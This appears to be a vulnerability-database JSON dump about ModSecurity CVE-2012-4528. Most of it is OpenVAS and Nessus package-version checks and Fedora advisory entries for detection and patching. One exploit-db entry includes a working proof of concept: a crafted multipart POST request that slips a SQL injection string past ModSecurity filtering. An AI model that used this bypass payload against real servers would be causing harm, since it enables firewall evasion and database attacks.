It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865688);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-07 10:02:43 +0530 (Fri, 07 Jun 2013)\");\n script_cve_id(\"CVE-2013-2765\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-9518\");\n\n script_xref(name: \"FEDORA\", value: \"2013-9518\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/107810.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-07T00:00:00", "id": "OPENVAS:1361412562310865688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865688", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-9518", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-9518\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865688\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-07 10:02:43 +0530 (Fri, 07 Jun 2013)\");\n script_cve_id(\"CVE-2013-2765\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-9518\");\n script_xref(name:\"FEDORA\", value:\"2013-9518\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/107810.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-04-15T00:00:00", "id": "OPENVAS:1361412562310865552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865552", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-4834", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-4834\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865552\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-15 10:09:14 +0530 (Mon, 15 Apr 2013)\");\n script_cve_id(\"CVE-2012-4528\", \"CVE-2013-1915\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-4834\");\n script_xref(name:\"FEDORA\", value:\"2013-4834\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101898.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-08T12:58:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "description": "Check for the Version of apache-mod_security", "modified": "2018-01-08T00:00:00", "published": "2012-12-26T00:00:00", "id": "OPENVAS:831759", "href": "http://plugins.openvas.org/nasl.php?oid=831759", "type": "openvas", "title": "Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in\n apache-mod_security:\n\n ModSecurity before 2.6.6, when used with PHP, does not properly handle\n single quotes not at the beginning of a request parameter value in\n the Content-Disposition field of a request with a multipart/form-data\n Content-Type header, which allows remote attackers to bypass filtering\n rules and perform other attacks such as cross-site scripting (XSS)\n attacks. NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2009-5031 (CVE-2012-2751).\n \n ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part\n ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)\n (CVE-2012-4528).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"apache-mod_security on Mandriva Linux 2011.0\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:182\");\n script_id(831759);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-26 12:09:31 +0530 (Wed, 26 Dec 2012)\");\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2012:182\");\n script_name(\"Mandriva Update 
for apache-mod_security MDVSA-2012:182 (apache-mod_security)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apache-mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-mod_security\", rpm:\"apache-mod_security~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mlogc\", rpm:\"mlogc~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "description": "The remote host is missing an update for the 'apache-mod_security' package(s) announced via the referenced advisory.", "modified": "2019-03-12T00:00:00", "published": "2012-12-26T00:00:00", "id": "OPENVAS:1361412562310831759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831759", "type": "openvas", "title": "Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:182\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831759\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-26 12:09:31 +0530 (Wed, 26 Dec 2012)\");\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"MDVSA\", value:\"2012:182\");\n script_name(\"Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_2011\\.0\");\n script_tag(name:\"affected\", value:\"apache-mod_security on Mandriva Linux 2011.0\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in\n apache-mod_security:\n\n ModSecurity before 2.6.6, when used with PHP, does not properly handle\n single quotes not at the beginning of a request parameter value in\n the Content-Disposition field of a request with a multipart/form-data\n Content-Type header, which allows remote attackers to bypass filtering\n rules and perform other attacks such as cross-site scripting (XSS)\n attacks. NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2009-5031 (CVE-2012-2751).\n\n ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part\n ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)\n (CVE-2012-4528).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-mod_security\", rpm:\"apache-mod_security~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mlogc\", rpm:\"mlogc~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, 
"vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T06:57:56", "description": "ModSecurity POST Parameters Security Bypass Vulnerability. CVE-2012-4528. Remote exploit for linux platform", "published": "2012-10-17T00:00:00", "type": "exploitdb", "title": "ModSecurity POST Parameters Security Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4528"], "modified": "2012-10-17T00:00:00", "id": "EDB-ID:37949", "href": "https://www.exploit-db.com/exploits/37949/", "sourceData": "source: http://www.securityfocus.com/bid/56096/info\r\n\r\nModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.\r\n\r\nSuccessful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.\r\n\r\nModSecurity 2.6.8 is vulnerable; other versions may also be affected. \r\n\r\nProof of concept:\r\n-----------------\r\n\r\nwut.php:\r\n--------\r\n\r\n<? echo $POST[xxx] ?>\r\n\r\n\r\nPOST request:\r\n-------------\r\n\r\nPOST /wut.php HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=A\r\nContent-Length: 161\r\n\r\n--A\r\nContent-Disposition: form-data; name=\"xxx\"[\\r][\\r][\\n]\r\n--A\r\nContent-Disposition: form-data; name=\"yyy\"; filename=\"z\"\r\n\r\n1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n\r\n--A--\r\n\r\n\r\nOutput:\r\n-------\r\n\r\n1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n\r\n(any change in the header should produce a 403)d\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37949/"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. 
", "modified": "2012-12-01T08:36:28", "published": "2012-12-01T08:36:28", "id": "FEDORA:F3634200D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.1-3.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "This package provides the base rules for mod_security. ", "modified": "2012-11-23T08:08:01", "published": "2012-11-23T08:08:01", "id": "FEDORA:440B8236F3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mod_security_crs-2.2.6-3.fc18", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2012-11-23T08:08:01", "published": "2012-11-23T08:08:01", "id": "FEDORA:4C7B7236F4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mod_security-2.7.1-3.fc18", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "This package provides the base rules for mod_security. ", "modified": "2012-12-01T08:36:28", "published": "2012-12-01T08:36:28", "id": "FEDORA:EA9BC200D0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security_crs-2.2.6-3.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. 
It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2013-06-06T01:34:19", "published": "2013-06-06T01:34:19", "id": "FEDORA:D2B39219A9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.3-2.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2013-04-14T00:26:53", "published": "2013-04-14T00:26:53", "id": "FEDORA:12B0C234C4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.3-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T11:54:02", "description": "A vulnerability has been discovered and corrected in\napache-mod_security :\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on 2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct this issue.\n\nNOTE: This advisory was previously given the MDVSA-2013:016\nidentifier by mistake.", "edition": 24, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2013:029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:apache-mod_security", "p-cpe:/a:mandriva:linux:mlogc"], "id": "MANDRIVA_MDVSA-2013-029.NASL", "href": "https://www.tenable.com/plugins/nessus/66043", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 
package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:029. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66043);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_xref(name:\"MDVSA\", value:\"2013:029\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2013:029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in\napache-mod_security :\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct this issue.\n\nNOTE: This advisory was previousely given the MDVSA-2013:016\nidentifier by mistake.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-mod_security and / or mlogc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mlogc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_security-2.6.3-5.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"mlogc-2.6.3-5.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:10:13", "description": " - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-11-26T00:00:00", "title": "Fedora 18 : mod_security-2.7.1-3.fc18 / mod_security_crs-2.2.6-3.fc18 (2012-18278)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2012-11-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:mod_security", "p-cpe:/a:fedoraproject:fedora:mod_security_crs"], "id": "FEDORA_2012-18278.NASL", "href": "https://www.tenable.com/plugins/nessus/63037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18278.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63037);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n script_xref(name:\"FEDORA\", value:\"2012-18278\");\n\n script_name(english:\"Fedora 18 : mod_security-2.7.1-3.fc18 / mod_security_crs-2.2.6-3.fc18 (2012-18278)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
